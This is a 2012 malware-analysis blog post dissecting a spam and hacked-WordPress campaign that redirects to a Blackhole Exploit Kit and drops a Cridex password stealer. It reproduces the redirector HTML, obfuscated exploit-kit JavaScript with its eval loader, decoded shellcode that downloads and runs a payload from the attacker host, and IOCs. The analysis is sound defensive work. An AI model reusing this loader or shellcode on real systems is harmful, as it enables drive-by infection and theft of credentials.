Sunday, December 9, 2012

Spam "You have been sent a file" + WordPress Redirector * BHEK2.x(Plugindetect 0.7.9) + New Shellcode Obfuscation = Cridex Password Stealer

Infection Summary

Spam emails to redirector landing page. Wordpress hacked page: isoheraly.wordpress.com / 74.200.244.59, 76.74.254.120, 72.233.2.58, 76.74.254.123, 74.200.243.251, 72.233.69.6 Landing page redirect: visionuvce.in / 173.254.28.115 PluginDetect/BHEK: pelamutrika.ru / 202.180.221.186 CNC/Proxy: 180.235.150.72:8080 , 203.113.98.131:80, 173.224.221.135:8080 206.176.226.157:8080, 132.248.49.112, 113.130.65.77
Here's the garbage:
column.php 2a80f7345c390d1b07a51eb3d2d47c65 (9/46) = PluginDetect 0.7.9(Obfs) contacts.exe a8ccedc5fe10ea98cb84a8ad20901d8e (25/46) = Trojan/Downloader exp2.tmp.exe dde1d5cfed7d5646239aed75c0cd0add (3/46) = Trojan/PWDStealer/Backdoor field.swf cee585aab7e27d917f57cb6ecadf39d4 (22/46) Flash EXP CVE-2011-0611 infector1.pdf 6ae849734bca6275978ae5026c00b9a6 (18/46) PDF EXP CVE-2009-0927 CVE-2008-2992 CVE-2007-5659 CVE-2009-4324 infector2.pdf fad56fcb294197a25dad3e05beba3fcf (2/46) PDF EXP CVE-2010-0188 redirect.htm 791f2fde75e66b41d862096138f3f70a (17/46) Landingpage HTML redirector score.swf 8ee6d435e5bb423671bd03728745bd0b (17/46) swf EXP CVE-2012-0769 spn.jar 544ba62e8d94c2a6d4a9c9e4de923f09 (8/45) jar EXP CVE-2012-5076 spn2.jar 33fefa4d50e3d6f4db773ffec1d4645a (6/46) jar EXP CVE-2012-4681 & CVE-2012-1723 spn3.jar 3ae32c5c9d390a99132d97745cb7ac29 (8/46) jar EXP CVE-2012-0507 & CVE-2012-4681 t.pdf d1e2ff36a6c882b289d3b736d915a6cc (23/43) PDF EXP CVE-2009-2990 *) ↑Click MD5 to see VirusTotal Details

Source of Infection

This time we would like to report the infection of trojan password stealer which is having a campaign using the below url:
h00p://visionuvce.in/redirect.htm
The campaign it self is on-going under two pattern, one pattern via spam email: You may aware of the email with subject: "You have been sent a file (Filename: Gohe-43.pdf)" or "Sendspace File Delivery Notification" Not only spam, also a hacked wordpress page like the below url: (WARNING, THE PAGE ABOVE IS UP AND ALIVE...) We checked the sources of the infector link:
--18:17:50--  h00p://visionuvce.in/redirect.htm
           => `redirect.htm'
Resolving visionuvce.in... seconds 0.00, 173.254.28.115
Caching visionuvce.in => 173.254.28.115
Connecting to visionuvce.in|173.254.28.115|:80... seconds 0.00, connected.
---request begin---
GET /redirect.htm HTTP/1.0
Referer: http://www.google.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6)
Accept: */*
Host: visionuvce.in
Connection: Keep-Alive
---request end---
HTTP request sent, awaiting response...
---response begin---
HTTP/1.1 200 OK
Date: Sat, 08 Dec 2012 09:17:50 GMT
Server: Apache
Last-Modified: Fri, 07 Dec 2012 14:38:47 GMT
ETag: "5162339-1a7-4d0442c60507d"
Accept-Ranges: bytes
Content-Length: 423
Cache-Control: max-age=1209600
Expires: Sat, 22 Dec 2012 09:17:50 GMT
Vary: Accept-Encoding
Keep-Alive: timeout=10, max=30
Connection: Keep-Alive
Content-Type: text/html
---response end---
200 OK
Registered socket 1896 for persistent reuse.
Length: 423 [text/html]
100%[====================================>] 423           --.--K/s
18:17:51 (13.88 MB/s) - `redirect.htm' saved [423/423]
↑inside the html, there is a BHEK2 redirector↓
$ cat redirect.htm

<html>
 <head>
  <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Please wait</title>
 </head>
 <body>  
<h1><b>Please wait a moment ... You will be forwarded... </h1></b>
<h4>Internet Explorer / Mozilla Firefox compatible only</h4><br>
<script>
var1=49;
var2=var1;
if(var1==var2) 
{document.location="h00p://pelamutrika・ru:8080/forum/links/column.php";}
</script>
</body>
</html>
So this is how our crusade starts..

PluginDetect 0.7.9 with new shellcode obfuscation

Using the right parameter we fetched the column.php...
--18:22:20--  h00p://pelamutrika・ru:8080/forum/links/column.php
           => `column.php'
Resolving pelamutrika・ru... seconds 0.00, 202.180.221.186
Caching pelamutrika・ru => 202.180.221.186
Connecting to pelamutrika・ru|202.180.221.186|:8080... seconds 0.00, connected.
---request begin---
GET /forum/links/column.php HTTP/1.0
Referer: h00p://visionuvce・in/redirect.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6)
Accept: */*
Host: pelamutrika.ru:8080
Connection: Keep-Alive
---request end---
HTTP request sent, awaiting response...
---response begin---
HTTP/1.1 200 OK
Server: nginx/1.0.4
Date: Sat, 08 Dec 2012 09:20:14 GMT
Content-Type: text/html; charset=CP-1251
Connection: close
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Vary: Accept-Encoding
---response end---
200 OK
Length: unspecified [text/html]
18:22:28 (21.64 KB/s) - `column.php' saved [102600]
which contains latest obfuscated PluginDetect 0.7.9 --->>[PASTEBIN] The structure of obfuscation is not special, is as per I commented below:
//let's ignore the html base tags...
<html><head><title></title></head><body>

// This is the jar infector applet to be directly downloaded, via IE header-
// "User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.6.0_23"
//
<applet archive="h00p://pelamutrika.ru:8080/forum/links/column.php?ckh=ldrxik&xnfinc=wyzs" code="hw">
<param name="prime" value="V0Kyl8qVwlKOrfrfj.tlK0j-8oqij%t-K0ow3D3xS.b1fO6oO68O68O11RFebhvO6qO60O1hO11O6qO6qO16O6CO6tRUb6.R-qbDRS.b8" />
<param name="val" value="Dyy3Ojj3e-"/></applet>

<div></div>

// First scattered evil script...
<script>gg="getA"+"ttri";qq="q";asd=function(){r=a[gg+"bute"](i);};p="p"+"a";</script>

// Hiding the array of obfuscation data in var q(0 to 32)in DIV tag....
<div id="q" 
  0=";08f70;28725;85k7m;58d7c;57g7q;84n78;....
  1=
  2
  :
  :
 32=";72n30;6292h;47q83;78383;78949;02930;...
</div>

//The deobfuscator generator...
<script>
  if(document.getElementsByTagName("div").length>0)
   {
   a=document.getElementById(qq);
   s="";
   for(i=0;;i++){
     asd();
     if(r){s=s+r;}else break;
                }
   a=zxv=s;
   s=hwebewg="";
   p=parseInt;
   for(i=0;i<a.length;i+=2){
      if(a["substr"](i,1)==";")continue;
      if(document.getElementsByTagName("div").length>0)s+=String["fromCharCode"]((p(a.substr(i,2),27)+5)/2);
   }
c=s;
if(window.document){e=eval("eval");
if(document.getElementsByTagName("div")[0].style.left==="")e(c);
   }}
</script>
</body></html>
By using the previous post guidance on how to crack this - obfuscation you can get the original infector code w/PluginDetect 0.7.9, as per I pasted here --->>[PASTEBIN]

What's the difference of this BHEK2 Infection?

The difference is in the shellcode and the payload. Other differences are minors- and insignificant to be reported in this blog. The CVE exploits used in components (jar, pdf & swf) are also same as before, means the below list of files are the same as previous week's report: spn.jar, spn2.jar, spn3.jar, t.pdf, infector1.pdf, infector2.pdf, score.swf

The Shellcode

The shellcode itself is obfuscated in new way that automation tool can't crack it automatically (yet), is in the below function:
function getShellCode(){
  var a = "
8282!%5114!%15e4!%04e0!%3451!%e044!..
2191!%b1b1!%a121!%21b1!%9154!%3421!..
2191!%b181!%e451!%7115!%0485!%6085!..
8170!%8101!%2101!%a5d5!%9460!%1434!..
15e1!%eee6!%3733!%2e2a!%59b1!%7492!..
8224!%ce24!%82d5!%8a71!%2df6!%82d5!..
c224!%7de7!%82b7!%e324!%8ed5!%c3da!..
2a9e!%8217!%5312!%eec6!%4444!%60c4!..
7de7!%8282!%0d82!%b704!%b580!%8050!..
42fe!%47c0!%825a!%9282!%4cc2!%a59a!..
d5a5!%8204!%6482!%0474!%7dbc!%bed2!..
8724!%8207!%8282!%0c82!%ac1d!%7d7d!..
8a55!%0480!%583a!%3cb7!%17be!%3867!..
e43a!%b25f!%67c0!%673a!%d5ec!%3173!..
58b2!%964d!%1e16!%ddb1!%80b2!%3ae5!..
c0da!%fac1!%d53d!%11e2!%bee6!%8681!..
e502!%e73a!%8543!%423a!%3a86!%8681!..
042e!%0382!%ef08!%9ea0!%6618!%139c!..
.split("").
  reverse().join("");
  return a["replace"](/\%!/g, "%" + "u")
}
the split, reverse and join following by replacing"%1" with "%u" looks confusing the wepawet or jsunpack, so it doesn't burped the correct result. You can use my trick to write JS/code like below to crack it:
var x="";
var a = "8282!%5114!%15e4!%04e0!%3451!%e044!%9134!%2551!%74e..
492!%621a!%6d2a!%4c0b!%6662!%7d6a!%6d7d!%0c4b!%e702!%6d7d!%8..
%f4b5!%a5d4!%c2c0!%42fe!%47c0!%825a!%9282!%4cc2!%a59a!%a23c!..
a!%d5ec!%3173!%3c9d!%2f86!%52b2!%9e3e!%c502!%01ad!%6983!%3f7..
414!%1414!%".split("").reverse().join("");
x=a["replace"](/\%!/g, "%" + "u");
eval(x);
And the eval() will be the correct shellcode as per below:
%u4141%u4141%u8366%ufce4%uebfc%u5810%uc931%u8166%u0ae9%u80fe%u2..
13%uce5d%ua376%u0c76%uf52b%ua34e%u6324%u6ea5%ud7c4%u0c7c%ua324%..
4d5a%u5b4f%u6cef%u2c0c%u5a5e%u1a1b%u6cef%u200c%u0508%u085b%u407..
%ua126%u2947%u1b95%ua2e2%u3373%u6eee%u1e51%u0732%u4058%u5c5c%u1..
This format can be cracked well by some automation, or, you can do it manually like I do by deleting "%u" + extract it into binary, like the below snapshot (it is a hexed code..useless/unharmed one)
41 41 41 41 66 83 e4 fc  fc eb 1O 58 31 c9 66 81  AAAAf......X1.f. 
e9 Oa fe 8O 3O 28 4O e2  fa eb O5 e8 eb ff ff ff  ....O(@......... 
ad cc 5d 1c c1 77 1b e8  4c a3 68 18 a3 68 24 a3  ..]..w..L.h..h$. 
58 34 7e a3 5e 2O 1b f3  4e a3 76 14 2b 5c 1b O4  X4~.^...N.v.+\.. 
a9 c6 3d 38 d7 d7 9O a3  68 18 eb 6e 11 2e 5d d3  ..=8....h..n..]. 
af 1c Oc ad cc 5d 79 c1  c3 64 79 7e a3 5d 14 a3  .....]y..dy~.].. 
5c 1d 5O 2b dd 7e a3 5e  O8 2b dd 1b e1 61 69 d4  \.P+.~.^.+...ai. 
85 2b ed 1b f3 27 96 38  1O da 5c 2O e9 e3 25 2b  .+...'.8..\...%+ 
f2 68 c3 d9 13 37 5d ce  76 a3 76 Oc 2b f5 4e a3  .h...7].v.v.+.N. 
24 63 a5 6e c4 d7 7c Oc  24 a3 fO 2b f5 a3 2c a3  $c.n..|.$..+..,. 
2b ed 83 76 71 eb c3 7b  85 a3 4O O8 a8 55 24 1b  +..vq..{..@..U$. 
5c 2b be c3 db a3 4O 2O  a3 df 42 2d 71 cO bO d7  \+....@...B-q... 
d7 d7 ca d1 cO 28 28 28  28 7O 78 42 68 4O d7 28  .....((((pxBh@.( 
28 28 78 ab e8 31 78 7d  a3 c4 a3 76 38 ab eb 2d  ((x..1x}...v8..- 
d7 cb 4O 47 46 28 28 4O  5d 5a 44 45 7c d7 3e ab  ..@GF((@]ZDE|.>. 
ec 2O a3 cO cO 49 d7 d7  d7 c3 2a c3 5a a9 c4 2c  .....I....*.Z.., 
29 28 28 a5 74 Oc 24 ef  2c Oc 5a 4d 4f 5b ef 6c  )((.t.$.,.ZMO[.l 
Oc 2c 5e 5a 1b 1a ef 6c  Oc 2O O8 O5 5b O8 7b 4O  .,^Z...l....[.{@ 
dO 28 28 28 d7 7e 24 a3  cO 1b e1 79 ef 6c 35 28  .(((.~$....y.l5( 
5f 58 4a 5c ef 6c 35 2d  O6 4c 44 44 ee 6c 35 21  _XJ\.l5-.LDD.l5! 
28 71 a2 e9 2c 18 aO 6c  35 2c 69 79 42 28 42 28  (q..,..l5,iyB(B( 
7b 7f 42 28 d7 7e 3c ad  e8 5d 3e 42 28 7b d7 7e  {.B(.~<..]>B({.~ 
2c 42 28 ab c3 24 7b d7  7e 2c ab eb 24 c3 2a c3  ,B(..${.~,..$.*. 
3b 6f a8 17 28 5d d2 6f  a8 17 28 5d ec 42 28 42  ;o..(].o..(].B(B 
d6 d7 7e 2O cO b4 d6 d7  d7 a6 66 26 c4 bO d6 a2  ..~.......f&.... 
26 a1 47 29 95 1b e2 a2  73 33 ee 6e 51 1e 32 O7  &.G)....s3.nQ.2. 
58 4O 5c 5c 58 12 O7 O7  58 4d 44 49 45 5d 5c 5a  X@\\X...XMDIE]\Z 
41 43 49 O6 5a 5d 12 1O  18 1O 18 O7 4e 47 5a 5d  ACI.Z]......NGZ] 
45 O7 44 41 46 43 5b O7  4b 47 44 5d 45 46 O6 58  E.DAFC[.KGD]EF.X 
4O 58 17 51 4e 15 1b 18  12 19 46 12 19 41 12 19  @X.QN.....F..A.. 
41 12 1b 1b Oe 59 4d 15  1a 5e 12 19 43 12 19 45  A....YM..^..C..E 
12 1b 1a 12 1b 1b 12 19  43 12 19 43 12 1b 19 12  ........C..C.... 
19 42 12 19 47 Oe 52 15  19 43 Oe 44 43 15 4O Oe  .B..G.R..C.DC.@. 
51 4e 15 41 28 28                                 QN.A(( 
This means the API ops using kernel32.dll & urlmon.dll to download, save, run & register the malware into your PC:
0x7c801ad9 kernel32.VirtualProtect(lpAddress=0x4020cf, dwSize=255)
0x7c801d7b kernel32.LoadLibraryA(lpFileName=urlmon)
0x7c835dfa kernel32.GetTempPathA(lpBuffer=0x22fc60, nBufferLength=248, [lpBuffer=C:\DOCUME~1\Administrator\LOCALS~1\Temp\]) 
0x1a494bbe urlmon.URLDownloadToFileA(pCaller=0, szURL=h00p://pelamutrika・ru:8080/forum/links/column.php?yf=30:1n:1i:1i:33&qe=2v:1k:1m:32:33:1k:1k:31:1j:1o&z=1k&lk=h&yf=i, lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll)
0x7c86250d kernel32.WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
0x7c86250d kernel32.WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
0x7c81cb3b kernel32.TerminateThread(dwExitCode=0)

The Payload

In the shellcode, it was showing the payload download url as per below:
h00p://pelamutrika・ru:8080/forum/links/column.php?yf=30:1n:1i:1i:33&qe=2v:1k:1m:32:33:1k:1k:31:1j:1o&z=1k&lk=h&yf=i
I fetched it like this:
--13:34:29--  h00p://pelamutrika.ru:8080/forum/links/column.php?yf=30:1n:1i:1i:33&qe=2v:1k:1m:32:33:1k:1k:31:1j:1o&z=1k&lk=h&yf=i
           => `column.php@yf=30%3A1n%3A1i%3A1i%3A33&qe=2v%3A1k%3A1m%3A32%3A33%3A1k%3A1k%3A31%3A1j%3A1o&z=1k&lk=h&yf=i'
Resolving pelamutrika.ru... seconds 0.00, 202.180.221.186
Caching pelamutrika.ru => 202.180.221.186
Connecting to pelamutrika.ru|202.180.221.186|:8080... seconds 0.00, connected.
Created socket 1896.
Releasing 0x003d5768 (new refcount 1).
---request begin---
GET /forum/links/column.php?yf=30:1n:1i:1i:33&qe=2v:1k:1m:32:33:1k:1k:31:1j:1o&z=1k&lk=h&yf=i HTTP/1.0
Referer: h00p://pelamutrika.ru:8080/forum/links/column.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6)
Accept: */*
Host: pelamutrika.ru:8080
Connection: Keep-Alive
---request end---
HTTP request sent, awaiting response...
---response begin---
HTTP/1.1 200 OK
Server: nginx/1.0.4
Date: Sun, 09 Dec 2012 04:32:22 GMT
Content-Type: application/x-msdownload
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Pragma: public
Expires: Sun, 09 Dec 2012 04:33:15 GMT
Cache-Control: must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Disposition: attachment; filename="contacts.exe"
Content-Transfer-Encoding: binary
Content-Length: 121344
---response end---
200 OK
Registered socket 1896 for persistent reuse.
Length: 121,344 (119K) [application/x-msdownload]
100%[====================================>] 121,344       54.23K/s
13:34:33 (54.12 KB/s) - `column.php@yf=30%3A1n%3A1i%3A1i%3A33&qe=2v%3A1k%3A1m%3A32%3A33%3A1k%3A1k%3A31%3A1j%3A1o&z=1k&lk=h&yf=i' saved [121344/121344]
And there is your payload :-) You can also go through the infector**.pdf which having the same shellcode to download the payload. Which proven myself as the same one.

What is this payload really does?

Let's save the payload into the original name in the server as "contacts.exe". I analyzed the binary as per below:
0000   4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00    MZ..............
0010   B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00    ........@.......
0020   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
0030   00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00    ................
0040   0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68    ........!..L.!Th
0050   69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F    is program canno
0060   74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20    t be run in DOS
0070   6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00    mode....$.......
0080   50 45 00 00 4C 01 05 00 BF 0F C2 50 00 00 00 00    PE..L......P....
0090   00 00 00 00 E0 00 0F 01 0B 01 02 32 00 46 00 00    ...........2.F..
00A0   00 94 01 00 00 00 00 00 00 10 00 00 00 10 00 00    ................
00B0   00 70 00 00 00 00 40 00 00 10 00 00 00 02 00 00    .p....@.........
 :                            :                                  :
MD5:  a8ccedc5fe10ea98cb84a8ad20901d8e
Size:  118.5 KB ( 121344 bytes ) 
block   0x40
type    EXEC (Executable file)
os      windows
arch    i386
bits    32
endian  little

Valid PE file
Entry Point: 0x1000
Sections:
   .code 0x1000 0x2312 9216 <=== EP
   .text 0x4000 0x219a 8704
   .rdata 0x7000 0xc0 512
   .data 0x8000 0xa8c 2048
   
Compile Time: 0x50C20FBF [Fri Dec 07 15:48:15 2012 UTC]
Compiler Trace: MS Visual C++
CRC Failed. Claimed:  0, Actual:  153281
Invalid Import data at RVA: 0x8244  // Crypter?
the RVA is invalid: 0x2e2e9020  // Crypter?

//Suspicious DLL's Calls
DEP setting change trace:  0x40837c HeapCreate
Anti Debugging traces   :  0x40839c LoadLibraryA
Anti Debugging traces   :  0x4083a0 GetProcAddress
TLS aware call          :  0x408398 TlsAlloc

//Interesting strings:  "MopLon66"suggested Crypt series..

File     Mem      Strings..
------------------------------------
0x005E00 0x409A00 MopLon66/
0x005EF0 0x409AF0 MopLon661MopLon66SXPOWOTSXOXWWXWWVRQVVURQSXTRTTOWOVQRPSRWXTWRXXUTPXMopLon66ID
0x01D951 0x421551 ,UMopLon66
Interesting! All DLL calls can be reviewed well but many functions encrypted. // We can see plainly the data text..
.rdata:00407004 0000000C C IsAppThemed            
.rdata:00407010 0000000C C uxtheme.dll            
.rdata:0040701C 0000000E C DllGetVersion          
.rdata:0040702C 0000000D C COMCTL32.DLL           
.rdata:0040703C 0000000B C AlphaBlend             
.rdata:00407048 0000000C C msimg32.dll            
.data:0040843E  00000007 C memset                 
.data:00408446  0000000B C MSVCRT.dll             
.data:00408454  00000011 C GetModuleHandleA       
.data:00408468  0000000B C HeapCreate             
.data:00408476  0000000C C HeapDestroy            
.data:00408484  0000000C C ExitProcess            
.data:00408490  0000000D C KERNEL32.dll           
.data:004084A0  00000007 C strlen                 
.data:004084AA  00000007 C strcpy                 
.data:004084B4  00000008 C strncpy                
.data:004084BE  00000007 C strcat                 
.data:004084C8  00000005 C fabs                   
.data:004084D0  00000005 C ceil                   
.data:004084D8  00000007 C malloc                 
.data:004084E2  00000006 C floor                  
.data:004084EA  00000005 C free                   
.data:004084F2  00000007 C fclose                 
.data:004084FC  00000007 C memcpy                 
.data:00408506  00000007 C _CIexp                 
.data:00408510  00000009 C HeapFree               
.data:0040851C  0000000A C HeapAlloc              
.data:00408528  00000014 C GetCurrentProcessId    
.data:0040853E  00000013 C GetCurrentThreadId     
.data:00408554  00000009 C TlsAlloc               
.data:00408560  0000000D C LoadLibraryA           
.data:00408570  0000000F C GetProcAddress         
.data:00408582  0000000C C FreeLibrary            
.data:00408590  0000000E C GetVersionExA          
.data:004085A0  0000000C C HeapReAlloc            
.data:004085AE  00000010 C CallWindowProcA        
.data:004085C0  00000014 C GetForegroundWindow    
.data:004085D6  00000019 C GetWindowThreadProcessI
.data:004085F2  00000010 C IsWindowVisible        
.data:00408604  00000010 C IsWindowEnabled        
.data:00408616  0000000F C GetWindowLongA         
.data:00408628  0000000D C SetWindowPos           
.data:00408638  0000000D C EnableWindow           
.data:00408648  0000000C C EnumWindows            
.data:00408656  0000000C C DestroyIcon            
.data:00408664  00000009 C FillRect               
.data:0040866E  0000000B C USER32.DLL             
.data:0040867C  00000008 C EndPage                
.data:00408686  00000007 C EndDoc                 
.data:00408690  0000000E C GetObjectType          
.data:004086A0  0000000D C DeleteObject           
.data:004086B0  0000000B C GetObjectA             
.data:004086BE  00000013 C CreateCompatibleDC     
.data:004086D4  0000000A C GetDIBits              
.data:004086E0  00000009 C DeleteDC               
.data:004086EC  00000011 C CreateDIBSection       
.data:00408700  0000000D C SelectObject           
.data:00408710  00000007 C BitBlt                 
.data:0040871A  0000000D C CreateBitmap           
.data:0040872A  00000009 C SetPixel               
.data:00408736  0000000F C GetStockObject         
.data:00408746  0000000A C GDI32.DLL              
.data:00408752  00000011 C GetSaveFileNameA       
.data:00408766  00000011 C GetOpenFileNameA       
.data:00408778  0000000D C COMDLG32.DLL           
.data:00408788  00000015 C InitCommonControlsEx   
.data:0040879E  0000000D C COMCTL32.DLL           
.data:004087AE  0000000D C CoInitialize           
.data:004087BC  0000000A C OLE32.DLL
While the .rsrc data is crypted..with (AGAIN) signed: "MopLon66"
.rsrc:004094C9  00000005 C E????                           
.rsrc:004094D0  0000000E C 884L4+8+4+444,                  
.rsrc:00409510  00000005 C ++++4                           
.rsrc:00409521  00000005 C ?<!??                           
.rsrc:00409530  00000007 C +44U((E                         
.rsrc:0040953E  00000005 C G&???                           
.rsrc:00409549  00000006 C PPYEEE                          
.rsrc:00409557  0000000A C ?E,?=!;EAX                      
.rsrc:00409587  00000005 C P!PPP                           
.rsrc:0040959E  00000007 C 6G/$@4P                         
.rsrc:004095A6  00000007 C P !;;;P                         
.rsrc:004095BA  00000005 C J\t%\t\t                        
.rsrc:004095CD  00000009 C E<E(=GGZZ                       
.rsrc:004095E1  00000009 C f@@@1W\x1BH/                    
.rsrc:004095F8  00000007 C >C:%\t$$                        
.rsrc:00409603  0000000A C TML]GG'>>9                      
.rsrc:0040960E  00000005 C 6CX@:                           
.rsrc:00409615  00000006 C 02\b\v\vL                       
.rsrc:0040961C  0000001B C J%\rC,0\\>\bRM6='^d:@X6V9:C>L%  
   :     :        :      :   :
   :     :        :      :   :
.rsrc:00420B24  00000006 C ,ik0kK        
.rsrc:00420CB3  00000005 C o!3JZ         
.rsrc:00420CE7  00000007 C ,pu//Io       
.rsrc:00420D0C  00000008 C l!af[Glr      
.rsrc:00420E58  00000005 C \ns0bs        
.rsrc:00420E9B  00000005 C FXl\r6        
.rsrc:00420EDE  00000005 C !\r;{d        
.rsrc:00420F47  00000005 C o'8@/         
.rsrc:00420F9E  00000007 C \nCG\n/}u     
.rsrc:00420FAF  00000006 C 6,-!dR        
.rsrc:0042117F  00000005 C &NPw:         
.rsrc:00421195  00000008 C fE='u@IY      
.rsrc:0042130E  00000005 C o7$WQ         
.rsrc:00421551  0000000B C ,UMopLon66  <====THERE.
Let's reverse it, I doubt it works well though... :-) Well, to make it short, you'll see the a lot of undefined calls/fuctions like below: Which if you push it hard, it'll drag you to the exit command below:
loc_401B5E:             ; uExitCode
push    0
call    sub_401B78
push    hHeap           ; hHeap
call    j_HeapDestroy
call    j_ExitProcess
start endp
↑this is suggested that you should reverse w/breaking the crypter 1st. Got no much time to play w/this so let's run & see the evil acts.

Behavior Analysis

So friends, if you have an old PC, just install it with windows XP, and then install Wireshark, Regshot & Process Explorer so you can analyze how malware works! Do not depend in any VM environment in testing the malwares - since the recent malware are compiled with code to detect - VM. And this is base of my personal experience, w/o VM - simulation you'll get much more data than they who used VM. If you are doing daily work in service center, please - propose your boss to prepare a cheap junk PCs for this - purpose :-) For the setup, use he basic installation of WinXP, with - Java, Adobe, and IE w.the older versions is the better. Then back it up all harddisk with Norton Ghost or G4L, to be restore after any test try. The softwares installed are as per my junkPC/RAT screeshot below: ↑It's how I tested this "mess". See the marked parts, They are the softwares - I explained before plus some shortcut for pic snapshot (I use ONLY mspaint + notepad) and use full intranet connection + USB attached (for saving data). :-) Says who that analyzing malware is difficult? It is simple is it? So I just run the contacts.exe it as per pic above, it will just self-deleted, copied + executed KB0077165.exe with CMD command, and all of the sudden stopped and then the NEW malicious file's process started..↓ If we carefully see the details, it was started from the %Temp% path↓ If we see the %Temp% there were files dropped by this malware↓ This malware also creates threads via kernel.dll as per below snapshot: Which suggested threaded as service. Let's find out deeper about how it goes below: The new downloaded file itself has the below details:
0000  4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00  MZ..............
0010  B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00  ........@.......
0020  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0030  00 00 00 00 00 00 00 00 00 00 00 00 E0 00 00 00  ................
0040  0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68  ........!..L.!Th
0050  69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F  is program canno
0060  74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20  t be run in DOS
0070  6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00  mode....$.......
0080  F1 B6 E2 5C B5 D7 8C 0F B5 D7 8C 0F B5 D7 8C 0F  ................
0090  36 DF 83 0F B0 D7 8C 0F 36 DF D1 0F B8 D7 8C 0F  6.......6.......
00A0  B5 D7 8D 0F EA D7 8C 0F 3B DF D3 0F B8 D7 8C 0F  ........;.......
00B0  36 DF D0 0F B4 D7 8C 0F 3B DF EC 0F B8 D7 8C 0F  6.......;.......
00C0  36 DF D2 0F B4 D7 8C 0F 36 DF D6 0F B4 D7 8C 0F  6.......6.......
00D0  52 69 63 68 B5 D7 8C 0F 00 00 00 00 00 00 00 00  Rich............
00E0  50 45 00 00 4C 01 05 00 36 A9 81 3F 00 00 00 00  PE..L...6..?....
00F0  00 00 00 00 E0 00 02 01 0B 01 08 00 00 60 02 00  .............`..
0100  00 10 01 00 00 00 00 00 C7 11 00 00 00 10 00 00  ................
 :                         :                                :
MD5:    dde1d5cfed7d5646239aed75c0cd0add
Size:   196.0 KB ( 200704 bytes ) 
Name:   exp2.tmp.exe
block   0x40
type    EXEC (Executable file)
os      windows
arch    i386
bits    32
endian  little
Entry Point:  0x11c7
Compile Time: 0x3F81A936 [Mon Oct 06 17:41:10 2003 UTC]
Compiler Trace: MS Visual C++

Sections:
  .text 0x1000 0x25052 155648
  .rdata 0x27000 0x9d4 4096
  .data 0x28000 0x100418 4096
  .rsrc 0x129000 0x67a0 28672

//Fake MS Product Attributes:
  LangID: 040904B0
  LegalCopyright: \xa9 Microsoft Corporation. All rights reserved.
  InternalName: Eudcedit  
  FileVersion: 5.2.3790.3959 (srv03_sp2_rtm.070216-1710)  
  CompanyName: Microsoft Corporation  
  ProductName: Microsoft\xae Windows\xae Operating System  
  ProductVersion: 5.2.3790.3959  
  FileDescription: Private Character Editor  
  OriginalFilename: EUDCEDIT.EXE  
  
//Full Registry Activity...(incl. Deletion...)
  ADVAPI32.dll.RegCloseKey Hint[395]
  ADVAPI32.dll.RegSetValueExW Hint[442]
  ADVAPI32.dll.RegQueryInfoKeyW Hint[426]
  ADVAPI32.dll.RegDeleteValueW Hint[405]
  ADVAPI32.dll.RegEnumValueW Hint[412]
  ADVAPI32.dll.RegEnumKeyExW Hint[409]
  ADVAPI32.dll.RegDeleteKeyW Hint[403]
  ADVAPI32.dll.RegCreateKeyExW Hint[400]
  ADVAPI32.dll.RegOpenKeyExW Hint[421]


// interesting strings...

